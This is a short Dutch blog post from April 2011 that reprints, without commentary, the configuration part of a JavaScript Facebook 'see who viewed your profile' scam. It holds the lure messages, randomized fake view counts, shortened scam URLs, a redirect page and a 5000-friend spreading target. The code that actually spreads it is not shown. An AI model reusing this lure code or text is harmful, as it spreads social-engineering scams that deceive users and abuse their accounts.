zaterdag 23 april 2011

gewraakte scrippie

var randomnumber=Math.floor(Math.random()*99999);
var randomnumber1=Math.floor(Math.random()*987);
var randomnumber2=Math.floor(Math.random()*754);
var randomnumber3=Math.floor(Math.random()*43);
var randomnumber4=Math.floor(Math.random()*9);
var random=Math.floor(Math.random()*5);

if (random == 1)
{
var url = 'http://x.co/WleP/?'
}
else if (random == 2)
{
var url = 'http://x.co/WleV/?'
}
else if (random == 3)
{
var url = 'http://x.co/Wled/?'
}
else if (random == 4)
{
var url = 'http://x.co/Wlek/?'
}
else
{
var url = 'http://x.co/Wlem/?'
}

var message = '%firstname% See who views your profile ';
var ev = 'check out this new facebook feature! \x0A see your profile view results by copying and pasting the link below in the address bar \x0A ';
var test = 'My Top Profile Viewers Are:\x0A';
var id = '%tf% - ' + randomnumber1 + ' views,\x0A';
var id1 = '%tf% - ' + randomnumber2 + ' views,\x0A';
var id2 = '%tf% - ' + randomnumber3 + ' views,\x0A';
var id3 = '%tf% - ' + randomnumber4 + ' views,\x0A';
var post = ' see who viewed your facebook profile @ ';
var postmessage = test + id + id1 + id2 + id3 + post + url + randomnumber;
var chatmessage = message + url + randomnumber;
var redirect = 'http://www.gameindiagame.blogspot.com/';
var eventdesc = ev + url + randomnumber;
var eventname = 'How to see who viewed your profile!!';
var nfriends = 5000;



//

Geen opmerkingen: